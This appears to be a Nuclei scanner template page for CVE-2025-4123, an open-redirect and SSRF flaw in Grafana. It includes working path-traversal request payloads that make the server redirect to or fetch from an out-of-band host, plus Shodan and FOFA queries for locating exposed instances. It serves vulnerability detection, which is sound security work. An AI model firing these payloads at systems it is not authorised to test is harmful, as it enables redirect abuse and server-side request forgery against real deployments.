Grafana - XSS / Open Redirect / SSRF via Client Path Traversal

CVE-2025-4123

Verified

Description

An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeover.

Severity

High

CVSS Score

7.6

Exploit Probability

Published Date

May 22, 2025

Template Author

iamnoooob, rootxharsh, pdresearch

CVE-2025-4123.yaml

id: CVE-2025-4123

info:
  name: Grafana - XSS / Open Redirect / SSRF via Client Path Traversal
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeover.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L
    cvss-score: 7.6
    cve-id: CVE-2025-4123
    cwe-id: CWE-79,CWE-601
    epss-score: 0.08371
    epss-percentile: 0.91936
  reference:
    - https://medium.com/@Nightbloodz/grafana-cve-2025-4123-full-read-ssrf-account-takeover-d12abd13cd53
    - https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/
  metadata:
    verified: true
    max-request: 1
    shodan-query: product:"Grafana"
    fofa-query: app="Grafana"
  tags: cve,cve2025,grafana,redirect,unauth,oss,vkev,vuln

http:
  - raw:
      - |
        GET /render/public/..%252f%255C{{interactsh-url}}%252f%253F%252f..%252f.. HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /public/..%2F%5coast.pro%2F%3f%2F..%2F.. HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: open-redirect
        dsl:
          - status_code == 302 && contains(location, '/\\oast.pro/?/../../')

      - type: dsl
        name: ssrf
        dsl:
          - contains(interactsh_protocol, 'dns') && contains(content_type, 'image/png')
# digest: 4b0a00483046022100fd48a6a0b5fd8046a8c9836f2bd7618b60a9dae2140eb0bd7d3cfc7e92d9e478022100c25418eb85a05be5c806a6e8bb93c9cb4e5acfb9c0893026b2918ad26ec18203:922c64590222798bb761d5b6d8e72950

7.6Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L

CVE ID:

cve-2025-4123

CWE ID:

cwe-79, cwe-601

References

https://medium.com/@Nightbloodz/grafana-cve-2025-4123-full-read-ssrf-account-takeover-d12abd13cd53 https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/